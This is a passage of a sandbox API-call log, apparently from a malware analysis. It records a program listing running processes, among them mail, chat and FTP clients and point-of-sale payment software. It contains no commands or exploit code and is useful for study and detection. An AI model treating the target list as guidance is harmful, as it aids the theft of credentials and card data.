th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0161.390] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.391] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.393] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.394] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.396] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.397] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.399] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0161.400] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0161.402] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.403] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0161.405] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0161.407] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.408] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0161.410] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.412] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.413] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0161.415] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0161.435] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_decade_effect.exe")) returned 1 [0161.437] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="at_effort.exe")) returned 1 [0161.438] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0161.440] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="four.exe")) returned 1 [0161.441] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treatmentabout.exe")) returned 1 [0161.443] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treat.exe")) returned 1 [0161.444] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="quickly_mention_learn.exe")) returned 1 [0161.446] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="offer_shot.exe")) returned 1 [0161.447] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="total.exe")) returned 1 [0161.457] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="few.exe")) returned 1 [0161.459] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="our-available-watch.exe")) returned 1 [0161.460] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="reality.exe")) returned 1 [0161.462] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="surface.exe")) returned 1 [0161.464] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="wrong.exe")) returned 1 [0161.465] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="future employee.exe")) returned 1 [0161.467] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-majority-recognize.exe")) returned 1 [0161.468] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="land-be-area.exe")) returned 1 [0161.470] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="focus_memory_base.exe")) returned 1 [0161.471] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mrus.exe")) returned 1 [0161.473] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0161.475] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0161.476] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0161.478] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0161.481] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0161.482] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0161.484] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0161.486] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0161.487] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0161.489] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0161.491] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0161.493] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0161.495] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0161.497] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0161.499] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0161.501] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0161.503] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0161.505] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0161.507] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0161.509] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0161.511] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0161.512] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0161.514] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0161.516] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0161.518] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0161.520] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0161.522] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0161.524] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0161.527] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0161.528] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0161.530] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0161.532] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0161.534] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="unit.exe")) returned 1 [0161.535] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="military mission finish.exe")) returned 1 [0161.537] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0161.539] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0161.541] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0161.543] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0161.545] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0161.546] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0161.548] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0161.550] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0161.551] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0161.553] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0161.554] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0161.556] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.558] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0161.559] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, 